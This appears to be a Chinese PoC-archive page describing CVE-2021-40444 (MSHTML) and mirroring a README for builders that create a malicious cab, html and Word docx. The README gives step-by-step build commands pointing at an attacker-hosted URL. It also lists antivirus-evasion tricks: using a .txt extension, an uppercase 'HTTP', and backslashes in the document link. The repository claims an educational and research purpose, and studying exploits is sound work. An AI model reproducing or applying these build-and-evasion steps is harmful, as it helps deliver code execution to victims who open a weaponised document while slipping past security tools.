关联漏洞
标题:Microsoft MSHTML.DLL 路径遍历漏洞 (CVE-2021-40444)Description:Microsoft MSHTML.DLL是美国微软(Microsoft)公司的一个用于解析HTML语言的动态链接库,IE、Outlook、Outlook Express等应用程序都使用了该动态链接库。 Microsoft MSHTML.DLL 存在路径遍历漏洞,远程攻击者可以创建带有恶意ActiveX控件的特制Office文档,诱使受害者打开文档并在系统上执行任意代码。
Description
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit
介绍
CVE-2021-40444 builders
This repo contain builders of cab file, html file, and docx file for CVE-2021-40444 exploit. This repo is just for testing, research and educational purposes. You are responsible for how you use the code provided in this repo.
The code is developed by reversing malware samples found in wild and shared by various security researchers.
<b>The builders for this CVE are already public. The purpose of this repo is to check how effectively we can bypass static detections by different AV vendors for the docx files, at the time of writing.
</b><br><br>
The JS code can easily obfuscated by online tools or manually. But the docx file contains just one file which is document.xml.rels, on which the signatures can be based. What we can tamper in it so we can evade static detections of most of the AV.
The cabrc.exe is Microsoft exe included in Internet Explorer Administration Kit and can be downloaded from https://docs.microsoft.com/en-us/internet-explorer/ie11-ieak/ieak-information-and-downloads and after installation you would find this exe in "C:\Program Files (x86)\Windows IEAK 11"
There are 3 builders.
The code works for python 2.7
First go to CVE-2021-40444 folder and place your dll file there and rename it to IEcache.inf (or you can use the calc dll already there).
Then go to source folder and generate the cab file
c:\cve-2021-40444\sources\python generate_cab.py
Upload your cab file, and using the cab file URL generate the html file
c:\cve-2021-40444\sources\python generate_html.py http://192.168.1.12/new/winupdate.cab tests.txt (Note instead of using html extension, if we use .txt the exploit still works, but bypasses AV)
Now finally upload your html file and generate the doc file. Use HTTP (capital) instead of http, and "\" instead of "/", to bypass AV. And we dont need x-usc: too.
example: c:\cve-2021-40444\sources\python generate_doc.py HTTP:\\\192.168.1.12\new\tests.txt
The result is in front of you.<br><br>
<img src="screen2.png"></img><br><br><br>
<img src="screen.png"></img><br><br><br>
www.aslitsecurity.com<br>
info@aslitsecurity.com
文件快照
[4.0K] /data/pocs/1b5beaa1a2460249067545b6ef43210415f7b447
├── [4.0K] CVE-2021-40444
│ ├── [8.5K] IEcache.inf
│ └── [4.0K] source
│ ├── [ 79K] cabarc.exe
│ ├── [4.0K] doc
│ │ ├── [1.4K] [Content_Types].xml
│ │ ├── [4.0K] docProps
│ │ │ ├── [ 734] app.xml
│ │ │ └── [ 754] core.xml
│ │ ├── [4.0K] _rels
│ │ └── [4.0K] word
│ │ ├── [ 15K] document.xml
│ │ ├── [2.3K] fontTable.xml
│ │ ├── [4.0K] media
│ │ │ ├── [668K] image1.jpeg
│ │ │ └── [ 74] image2.wmf
│ │ ├── [4.0K] _rels
│ │ │ └── [1.3K] document.xml.rels
│ │ ├── [2.6K] settings.xml
│ │ ├── [ 32K] styles.xml
│ │ ├── [4.0K] theme
│ │ │ └── [6.9K] theme1.xml
│ │ └── [ 604] webSettings.xml
│ ├── [ 764] generate_cab.py
│ ├── [3.6K] generate_doc.py
│ └── [ 12K] generate_html.py
├── [2.1K] README.md
├── [119K] screen2.png
└── [ 69K] screen.png
9 directories, 20 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。